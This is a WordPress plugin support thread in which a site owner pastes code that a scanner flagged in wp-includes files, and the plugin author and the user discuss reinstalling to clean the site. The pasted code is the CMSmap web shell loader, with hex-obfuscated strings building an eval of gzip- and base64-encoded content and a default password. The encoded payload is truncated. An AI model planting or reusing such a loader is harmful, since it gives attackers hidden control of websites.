Support » Plugin: Frontend Publishing » File apperas to be malicious wp-includes/css/css.php

  • Resolved madhu patidar

    (@madhu-patidar)


    Hi,

    After scanning my site from wordfence plugin, I’m getting a message saying ‘../wp-includes/css/css.php’ and ‘../wp-includes/css/wp-config.php’. contain malicious code.

    The above both files contains below code- and i don’t have this plugin “CMSmap – WordPress Shell”.

    “<?php
    /**
    * Plugin Name: CMSmap – WordPress Shell
    * Plugin URI: https://github.com/m7x/cmsmap/
    * Description: Simple WordPress Shell – Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
    * Version: 1.0
    * Author: CMSmap
    * Author URI: https://github.com/m7x/cmsmap/
    * License: GPLv2
    */
    ?>
    <?php
    $password=’123456′;
    $shellname=’123456′;
    $myurl=null;
    error_reporting(0);
    @set_time_limit(0);
    function Class_UC_key($string){
    $array = strlen (trim($string));
    $debuger = ”;
    for($one = 0;$one < $array;$one+=2) {
    $debuger .= pack (“C”,hexdec (substr ($string,$one,2)));
    }
    return $debuger;
    }
    header(“content-Type: text/html; charset=gb2312”);
    $filename=Class_UC_key(“2470617373776F72643D27”).$password.
    Class_UC_key(“273B247368656C6C6E616D653D27”).$Username.
    Class_UC_key(“273B246D7975726C3D27”).$Url.
    Class_UC_key(“273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827″).’eJzsJ ………….. Y8f8Dk7fBIg==\’)));’;
    $PHP=Create_Function(”,$filename);$PHP();?>”

    I deleted these file but then it automatically re-creates itself ?

    Any ideas please?

    • This topic was modified 4 months, 4 weeks ago by madhu patidar.
Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author Hassan Akhtar

    (@khaxan)

    The contents of those files are supposed to be different from what you’re seeing. You may have malware on your site that is changing the files. Please try deleting the plugin and installing a fresh copy. If that doesn’t work you may have to try a professional malware removal service.

    ok.. thanks for reply..

    I didn’t find that issue but… I replaced all plugin with my local copy and also replaced wp-admin and wp-includes folder with new fresh wordpress folders.

    now its not showing that malicious code.

Viewing 2 replies - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.